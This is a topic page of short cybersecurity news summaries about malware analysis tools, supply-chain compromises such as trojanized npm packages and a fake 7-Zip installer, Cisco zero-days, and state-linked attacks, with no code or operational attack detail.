Topic: malware analysis
-
REMnux v8: AI-Powered Malware Analysis for Linux
REMnux v8 is a major rebuild of the malware analysis Linux distribution, migrating to Ubuntu 24.04 and introducing a new, flexible Cast-based installer for easier deployment. The release's most significant feature is the REMnux MCP server, which connects AI agents directly to over 200 analysis to...
Read More » -
Beware: Fake 7-Zip Site Pushes Malware-Laden Installer
A fraudulent website impersonating the official 7-Zip software distributes a trojanized installer that secretly enrolls the victim's computer into a residential proxy network for malicious traffic routing. The malware, which mimics the legitimate site's appearance, deploys hidden components, modi...
Read More » -
500 npm Packages Infected by Shai-Hulud Malware Leaking Secrets
Over 500 npm packages, including popular tools like Zapier and Postman, have been compromised by the Shai-Hulud malware, which steals developer secrets and uploads them to rapidly multiplying GitHub repositories. The attack uses trojanized versions of legitimate packages to inject malicious scrip...
Read More » -
Android Tablet Backdoor & Dell Zero-Day: Critical Week in Review
A critical firmware backdoor in Android tablets and a long-running espionage campaign exploiting a Dell zero-day highlight persistent supply chain security challenges and the stealthy nature of modern cyber adversaries. The role of the CISO is evolving to manage AI-augmented teams, while threats ...
Read More » -
$900K XSS Bounty, HybridPetya Attack, & Burger King Censorship
Restaurant Brands International issued a DMCA takedown against researchers who exposed data vulnerabilities, despite the issues being patched after private reporting. Google distributed $1.6 million in rewards at a cloud-focused bug bounty event, contributing to a total of $2.5 million in cloud-r...
Read More » -
CISA releases Thorium: Open-source malware & forensic analysis tool
CISA launched Thorium, an open-source platform for malware analysis and forensic investigations, developed with Sandia National Labs to automate cyberattack investigations efficiently. Thorium processes 1,700+ jobs per second and 10M+ files hourly, integrating commercial and custom tools for thre...
Read More » -
Microsoft's RIFT: Open-Source Tool for Rust Malware Analysis
Microsoft released RIFT, an open-source tool for analyzing Rust-based malware, addressing challenges posed by Rust's compilation methods and large binary sizes. RIFT uses three integrated components (static analyzer, signature generator, and IDA plugin) with FLIRT and binary diffing to efficientl...
Read More » -
Putting NICE Guidelines into Practice: Training Insights
SMBs can effectively train employees against cyber threats by focusing on a streamlined, scenario-based program derived from the NICE Framework, targeting the most common attacks like phishing, malware, and web-based threats. The training integrates technical skills with legal knowledge through r...
Read More » -
Russia's Sandworm Blamed for Polish Power Grid Wiper Attack
A Russian state-sponsored hacking group, Sandworm, is attributed with a cyberattack on Poland's energy grid in late 2025 using destructive DynoWiper malware, though it did not cause a power outage. The attack's timing is seen as symbolic, coinciding with the 10-year anniversary of Sandworm's 2015...
Read More » -
Urgent Samsung Patch Stops Spyware Exploit
Samsung has released a critical security update for a vulnerability (CVE-2025-21042) in its image processing library, which was actively exploited to install the LANDFALL spyware on mobile devices. The spyware uses a zero-click infection method via manipulated image files, allowing it to infect d...
Read More » -
Parrot OS Unveils 2026 Roadmap for Security & Platform Upgrades
Parrot OS is a specialized Debian-based Linux distribution for cybersecurity, integrating tools for penetration testing, forensics, malware analysis, and privacy research. The 2026 roadmap focuses on platform upgrades, including enhanced support for lightweight and container-based deployments, an...
Read More » -
ShadowV2: Self-Service DDoS Attacks Now Available
ShadowV2 is a DDoS botnet that exploits misconfigured Docker containers, offering a self-service model that allows customers to launch their own cyberattacks using legitimate development tools. It uses a Python-based command-and-control infrastructure on GitHub CodeSpaces to deploy malicious cont...
Read More » -
China-Linked Hackers Exploit Cisco Firewall Zero-Days
Cisco has released emergency patches for two actively exploited zero-day vulnerabilities (CVE-2025-20333 and CVE-2025-20362) in its ASA and FTD firewall software, linked to the ArcaneDoor espionage campaign. The vulnerabilities allowed attackers, suspected to be a China-based group, to execute co...
Read More » -
Active Attacks Exploit Cisco ASA Zero-Day Flaws
A coordinated international cybersecurity alert warns of active attacks exploiting zero-day vulnerabilities in Cisco ASA and FTD software, attributed to a sophisticated, likely state-sponsored threat actor linked to previous ArcaneDoor campaigns. Two critical vulnerabilities (CVE-2025-20362 and C...
Read More » -
Top Cybersecurity Jobs Hiring in September 2025
The cybersecurity field is experiencing high demand for professionals in September 2025, with global opportunities available in various roles and work arrangements, including remote positions. Key roles being recruited for include Application Security Engineers, CISOs, Cloud Security Architects, ...
Read More » -
Python Foundation Rejects US Security Grant
The Python Software Foundation rejected a $1.5 million U.S. government grant because the terms would have prohibited its diversity, equity, and inclusion (DEI) initiatives, conflicting with its core mission. The grant was intended to fund the development of proactive security tools for the Python...
Read More » -
Africa-Wide Cybercrime Sweep: 574 Arrests, $3M Recovered
Operation Sentinel, a coordinated international law enforcement effort across 19 African countries, resulted in 574 arrests and the recovery of $3 million, targeting major cybercrimes like business email compromise and ransomware. The operation caused significant technical disruptions by taking d...
Read More »